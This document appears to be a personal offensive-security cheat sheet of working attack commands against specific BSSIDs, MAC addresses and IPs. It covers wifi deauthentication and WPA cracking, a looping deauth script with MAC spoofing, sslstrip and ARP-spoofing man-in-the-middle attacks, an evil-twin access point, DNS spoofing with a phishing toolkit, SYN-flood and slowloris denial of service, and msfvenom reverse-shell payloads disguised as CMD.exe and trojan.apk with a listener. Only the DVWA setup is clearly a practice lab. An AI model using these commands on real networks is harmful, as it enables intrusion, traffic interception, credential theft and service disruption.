/******************Working with screen*********************/
screen -S hello
screen -ls
screen -S hello -r
screen -S hello -X quit

/******************WireLess*********************/
ifconfig
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng check wlan0 //kill all resalts shown in command above //
airodump-ng wlan0 //scans everyone connected to thet network//

airodump-ng -c 8 --bssid 74:DA:DA:16:05:90 -w sedfam_scan wlan0  //scans every traffic of the mac spcified, we run untill we see "WPA handshake: 74:DA:DA:16:05:90" messege //
aireplay-ng -0 0 -a 74:DA:DA:16:05:90 wlan0   //disconnects everyone from the network//
aireplay-ng -0 0 -a 74:DA:DA:16:05:90 wlan0 -c EE:99:DB:98:D0:CA //blocks the mac after -c in the network //

crunch 12 12 -t ,@@@@@@^%%%%  012345aedomfr | aircrack-ng -w - sedfam_scan-01.cap -e SedFam
crunch 12 12 -t Freedom^%%%% 02 | aircrack-ng -w - sedfam_scan-01.cap -e SedFam

///reaver
sudo wash -i wlan0
reaver -b 74:DA:DA:16:05:90 -i wlan0 -c 8 -vv
iwconfig wlan0 channel 8





#!/bin/bash

while true
do
aireplay-ng -0 5 -a 74:DA:DA:16:05:90 wlan0 -c EE:99:DB:98:D0:CA
ifconfig wlan0 down
macchanger -r wlan0 | grep "New MAC"
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig wlan0 | grep Mode

sleep 3
echo Waiting!!!!!
done


/**********************sslstrip*********************/
guide https://gitlab.com/kalilinux/packages/sslstrip

echo "1" > /proc/sys/net/ipv4/ip_forward // to return echo "0" > /proc/sys/net/ipv4/ip_forward //
cat /proc/sys/net/ipv4/ip_forward  // checking it
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 // forwarding trafic to my port //
iptables -t nat -L PREROUTING // checking it
arpspoof -i wlan0 -t 172.23.183.14 -r 172.23.160.1 // -t for target ip and -r for router //
iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT // opening port 8080 manualy //
iptables -L INPUT // checking if its there //

python3 sslstrip.py -l 8080
tail -f sslstrip.log



/**************************make a router evil twin********************/

sudo airbase-ng -a 74:DA:DA:16:05:90 --essid "SedFam" -c 8 wlan0

sudo brctl addbr evil
sudo brctl addif evil eno2
sudo brctl addif evil at0
ifconfig at0 0.0.0.0 up
ifconfig evil up
dhclient3 evil &
wireshark

/**************************dnschef*****************************/

configure modem to get to your laptop
dnschef --fakeip=172.16.67.134 --fakedomains=randomName.com --interface=172.16.67.134
sudo setoolkit // 1 , 2 , 3 , 2

/**************************Sql injection*********************************/
setting up application:
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA
sudo chmod -R 777 DVWA/
cd DVWA/config
sudo cp config.inc.php.dist config.inc.php  // edit the second file and set username and password
sudo nano /etc/php/8.1/apache2/php.ini // make these allow_url_fopen and allow_url_include on
sudo systemctl restart apache2.service
sudo service mysql restart
if problems see https://linuxhint.com/install-damn-vulnerable-web-application-dvwa-kali-linux/

setting up db:
sudo mysql -u root
SET PASSWORD FOR root@localhost=PASSWORD('newpass');
sudo mysql -u root -p

in main page default u and p is: admin, password

use berpsuit to cpture session cookie
/**************************D0S*********************************/

sudo hping3 -i u100 -S -p 80 192.168.1.62

// slowloris dos
nmap --script http-slowloris --max-parallelism 400  192.168.1.1 -vv // then download it from
./slowloris6.pl -dns 192.168.1.62 -port 80 -num 500



/**************************metasploit**************************/

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.67.128 x > /home/kali/Desktop/CMD.exe

msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.67.128 LPORT=7766 R> /home/kali/Desktop/trojan.apk

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 172.16.67.128
set LPORT 7766
exploit

